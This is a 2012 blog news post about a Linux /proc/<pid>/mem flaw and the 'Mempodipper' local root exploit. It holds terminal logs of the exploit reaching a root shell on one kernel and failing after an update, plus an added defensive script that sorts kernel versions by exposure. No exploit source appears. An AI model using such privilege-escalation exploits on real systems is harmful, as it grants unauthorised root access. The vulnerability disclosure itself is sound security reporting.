
Linux: From virtual memory access to root privileges

by milobit last modified Jan 24, 2012 05:29 PM
A new local security vulnerability that grants root privileges has been discovered

Shortly after Linus Torvalds announced last week that a problem with virtual memory permissions had been fixed, an exploit appeared that uses this flaw to gain root privileges.

Since version 2.6.39 of the Linux kernel, the data of every process can be viewed and modified through /proc/<pid>/mem. The checks currently performed have proven insufficient and are easy to bypass.

Immediately after this patch was published on the Nerdling Sapple blog, a working exploit appeared as well. The exploit manipulates the virtual memory of a setuid root process and thereby gives an ordinary user root privileges. Jay Freeman, alias Saurik, otherwise known for his work on the iPhone jailbreak environment, has produced a working version for Android as well.

Example of gaining root privileges:

milobit@blackpearl ~ $ uname -a
Linux blackpearl 3.2.0-gentoo-r1 #1 SMP PREEMPT Sun Jan 8 11:01:16 CET 2012 x86_64 Intel(R) Core(TM)2 CPU T7600 @ 2.33GHz GenuineIntel GNU/Linux
milobit@blackpearl ~ $ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/25468/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x401d58.
[+] Calculating su padding.
[+] Seeking to offset 0x401d4c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2# id    
uid=0(root) gid=0(root) groups=0(root),10(wheel),18(audio),19(cdrom),20(dialout),27(video),80(cdrw),85(usb),103(vboxusers),1000(milobit)
sh-4.2#

The exploit works reliably, as the example above shows.
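
An added example, not part of the original article or of the exploit: a shell triage of kernel release strings against the 2.6.39 boundary given above. The function names, result labels and inventory format are assumptions, and the sample inventory is constructed (it reuses the two release strings that appear on this page); `verify-fix` means the patch status must be confirmed with the distribution, because the release string alone does not show it.

```shell
#!/bin/sh
# Added example (not from the article): triage kernel release strings
# against the 2.6.39 boundary the article names.

# classify_kernel RELEASE -> "predates", "verify-fix" or "unknown"
classify_kernel() {
    base=${1%%[-+_]*}        # drop distro suffix: 3.2.0-gentoo-r1 -> 3.2.0
    case $base in
        ''|*[!0-9.]*|.*|*..*) echo unknown; return 0 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $base             # split into major minor patch
    IFS=$old_ifs
    major=$1; minor=${2:-0}; patch=${3:-0}
    if [ "$major" -gt 2 ] ||
       { [ "$major" -eq 2 ] && [ "$minor" -gt 6 ]; } ||
       { [ "$major" -eq 2 ] && [ "$minor" -eq 6 ] && [ "$patch" -ge 39 ]; }
    then
        echo verify-fix      # 2.6.39 or later: confirm the vendor patch is applied
    else
        echo predates        # older than 2.6.39
    fi
}

# triage_inventory: read "host release" lines on stdin, append the verdict.
triage_inventory() {
    while read -r host release; do
        [ -n "$host" ] || continue
        printf '%s %s %s\n' "$host" "$release" "$(classify_kernel "$release")"
    done
}

# Constructed inventory; host names are hypothetical.
sample_inventory() {
    cat <<'EOF'
host-a 3.2.0-gentoo-r1
host-b 3.2.1-gentoo-r2
host-c 2.6.38-8-generic
host-d custom-build
EOF
}

sample_inventory | triage_inventory
```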

 


Info: http://blog.zx2c4.com/749


Comments (1)

milobit Jan 31, 2012 01:27 PM
milobit@blackpearl ~ $ uname -a
Linux blackpearl 3.2.1-gentoo-r2 #1 SMP PREEMPT Tue Jan 31 12:07:56 CET 2012 x86_64 Intel(R) Core(TM)2 CPU T7600 @ 2.33GHz GenuineIntel GNU/Linux
milobit@blackpearl ~ $ ./
Display all 103 possibilities? (y or n)
milobit@blackpearl ~ $ ./m
marijana_slike/ mempodipper movie/
milobit@blackpearl ~ $ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4175/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x401d58.
[+] Calculating su padding.
[+] Seeking to offset 0x401d4c.
[+] Executing su with shellcode.
milobit@blackpearl ~ $